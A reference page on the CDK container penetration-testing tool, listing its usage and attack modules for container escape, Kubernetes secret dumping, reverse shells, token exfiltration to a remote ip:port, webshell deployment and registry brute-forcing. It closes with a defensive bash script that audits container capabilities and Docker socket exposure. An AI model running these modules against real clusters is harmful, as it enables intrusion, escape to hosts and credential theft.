Definition

CDK is a container penetration-testing tool.

This tool is really useful for CTFs where you gain a reverse shell inside a Docker container: it first enumerates the vulnerabilities and misconfigurations the container is exposed to, and then lets you exploit them.

Usage

Even though it is an easy tool to use, it can get hard when you need to modify a payload to make it work.

Evaluate the container:
    cdk evaluate --full

List the available exploit modules:
    cdk run --list

Run the chosen module:
    cdk run [script-name] [options]

Output

cdk run --list
k8s-cronjob             create cronjob with user specified image and cmd. Usage: cdk run k8s-cronjob (default|anonymous|[token-path]) (min|hour|day|[cron-expr]) [image] [args]
k8s-shadow-apiserver    duplicate kube-apiserver pod, disable logs and grant all privilege to anonymous user. usage: cdk run k8s-shadow-apiserver (default|anonymous|[service-account-token-path])
cap-dac-read-search     Read files from host or chroot to host and spawn a cmd. The First argument is file bind-mounted to container from host (default: /etc/hostname), the second argument specifies which file to read (default: /etc/shadow), the third and remaining arguments specifies command executed in host root filesystem (default: /bin/bash). If there is one argument, the first argument is the target file to read. When second argument is "/", this exploit will spawn a cmd.
k8s-configmap-dump      try to dump K8s configmap in multiple ways, usage: cdk run k8s-configmap-dump (auto|[service-account-token-path])
service-probe           scan subnet to find Docker/K8s inner services, usage: cdk run service-probe 192.168.1.0-255
docker-sock-pwn         Create and run [cmd] in a container with host root `/` mounted to container `/host` usage: ./cdk docker-sock-deploy [sock_path] [shell_cmd] example: ./cdk docker-sock-pwn /var/run/docker.sock "touch /host/tmp/pwn-success"
k8s-psp-dump            Dump K8S Pod Security Policies and try, usage: cdk run k8s-psp-dump (auto|[service-account-token-path])
shim-pwn                pwn CVE-2020-15257,start a privileged reverse shell to remote host or execute cmd. usage: "./cdk shim-pwn reverse [RHOST] [RPORT]" or "./cmd shim-pwn [SHELL_CMD]"
k8s-backdoor-daemonset  deploy image to every node using daemonset, usage: cdk run k8s-backdoor-daemonset (default|anonymous|[service-account-token-path]) [image] [cmd]
k8s-get-sa-token        Dump target service-account token and send it to remote ip:port, usage: cdk run k8s-get-sa-token (default|anonymous|[service-account-token-path]) [target-service-account] [ip] [port]
mount-disk              escape privileged container via disk mount, usage: `./cdk run mount-disk`
runc-pwn                container escape via CVE-2019-5736. usage: ./cdk runc-pwn [shell-cmd]
webshell-deploy         Write webshell to target path. Usage: cdk run webshell-deploy (php|jsp) [filepath].
ak-leakage              search AK/Secrets from input dir, usage: cdk run ak-leakage [dir]
registry-brute          To container image registry, brute force the accounts and passwords cracking. Usage: ./cdk registry-brute [registry-url] [username|file] [password|file]. Example: ./cdk registry-brute https://index.docker.io/ root,admin /tmp/passwordfile.
k8s-secret-dump         try to dump K8s secret in multiple ways, usage: cdk run k8s-secret-dump (auto|[service-account-token-path])
lxcfs-rw                escape container when root has LXCFS read & write privilege,  usage: `./cdk run lxcfs-rw`
reverse-shell           reverse shell to remote addr, usage: cdk run reverse-shell [ip:port]
mount-cgroup            escape privileged container via cgroup. usage: ./cdk run mount-cgroup "shell-cmd-payloads"
k8s-mitm-clusterip      Exploit CVE-2020-8554: Man in the middle using ExternalIPs, usage: cdk run k8s-mitm-clusterip (default|anonymous|[service-account-token-path]) [image] [ip] [port]
mount-procfs            escape container via mounted procfs. usage: cdk run mount-procfs [dir] "[shell-payload]"
rewrite-cgroup-devices  escape sys_admin capabilities container via rewrite cgroup devices.allow. usage: ./cdk run rewrite-cgroup-devices.
docker-sock-check       check if docker unix socket available. usage: ./cdk docker-sock-check [sock_path]
test-poc                this is the test script
check-ptrace            check if pid injection works with cap=SYS_PTRACE. usage: ./cdk run check-ptrace
istio-check             Check was the shell in a istio(service mesh) network, please note that this feature will request http://httpbin.org/get. Usage: cdk run istio-check.
docker-api-pwn          Create and run [cmd] in a container with host `/` mounted to `/host`. usage: ./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/pwn-success"
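The `cdk evaluate` step above works because several of the modules listed here have simple preconditions: cap-dac-read-search, check-ptrace and rewrite-cgroup-devices need CAP_DAC_READ_SEARCH, CAP_SYS_PTRACE and CAP_SYS_ADMIN respectively, and docker-sock-pwn needs the Docker socket to be mounted. The script below is an added, constructed example (not part of this page and not CDK's own code) that a defender can run inside a container to decode its CapEff mask from /proc/self/status and report which of those preconditions are present, so they can be dropped (for example with `--cap-drop`) before an attacker's enumeration finds them. The mask values in the comments are constructed inputs; the bit positions come from linux/capability.h.

```shell
#!/usr/bin/env bash
# Constructed example: audit a container's capability set and Docker socket
# exposure against the preconditions of CDK's escape modules.

# Capability bit positions from <linux/capability.h>.
CAP_DAC_READ_SEARCH=2
CAP_NET_ADMIN=12
CAP_SYS_MODULE=16
CAP_SYS_PTRACE=19
CAP_SYS_ADMIN=21

# risky_caps HEXMASK
#   Takes a CapEff value as printed by /proc/<pid>/status (e.g. 00000000a80425fb)
#   and prints, space separated, the names of the risky capabilities it grants.
#   Prints nothing when none of them are set.
risky_caps() {
    mask="$1"
    out=""
    for entry in "DAC_READ_SEARCH:$CAP_DAC_READ_SEARCH" \
                 "NET_ADMIN:$CAP_NET_ADMIN" \
                 "SYS_MODULE:$CAP_SYS_MODULE" \
                 "SYS_PTRACE:$CAP_SYS_PTRACE" \
                 "SYS_ADMIN:$CAP_SYS_ADMIN"; do
        name=${entry%%:*}
        bit=${entry##*:}
        # Shift the bit of interest down to position 0 and mask it off.
        if [ $(( (0x$mask >> bit) & 1 )) -eq 1 ]; then
            out="$out $name"
        fi
    done
    printf '%s\n' "${out# }"
}

# current_caps
#   Prints the effective capability mask of the calling shell.
current_caps() {
    awk '/^CapEff:/ { print $2 }' /proc/self/status
}

# docker_sock_exposed [PATH]
#   Returns 0 if a Docker control socket is reachable at PATH
#   (default /var/run/docker.sock), which is what docker-sock-pwn looks for.
docker_sock_exposed() {
    [ -S "${1:-/var/run/docker.sock}" ]
}

# report
#   Human-readable summary for the current container.
report() {
    if [ -r /proc/self/status ]; then
        caps=$(current_caps)
        printf 'CapEff: %s\n' "$caps"
        risky=$(risky_caps "$caps")
        if [ -n "$risky" ]; then
            printf 'risky capabilities present: %s\n' "$risky"
        else
            printf 'no risky capabilities present\n'
        fi
    fi
    if docker_sock_exposed; then
        printf 'Docker socket is mounted: docker-sock-pwn precondition met\n'
    else
        printf 'Docker socket not reachable\n'
    fi
}

# Example masks (constructed):
#   00000000a80425fb  Docker default capability set -> prints nothing
#   0000003fffffffff  a --privileged container      -> prints all five names
#   0000000000200000  only CAP_SYS_ADMIN granted    -> prints SYS_ADMIN
report
```

Running it in a container started with the Docker defaults reports no risky capabilities; in a `--privileged` container, or one started with `--cap-add SYS_ADMIN`, it names the capabilities that mount-cgroup, rewrite-cgroup-devices and friends depend on.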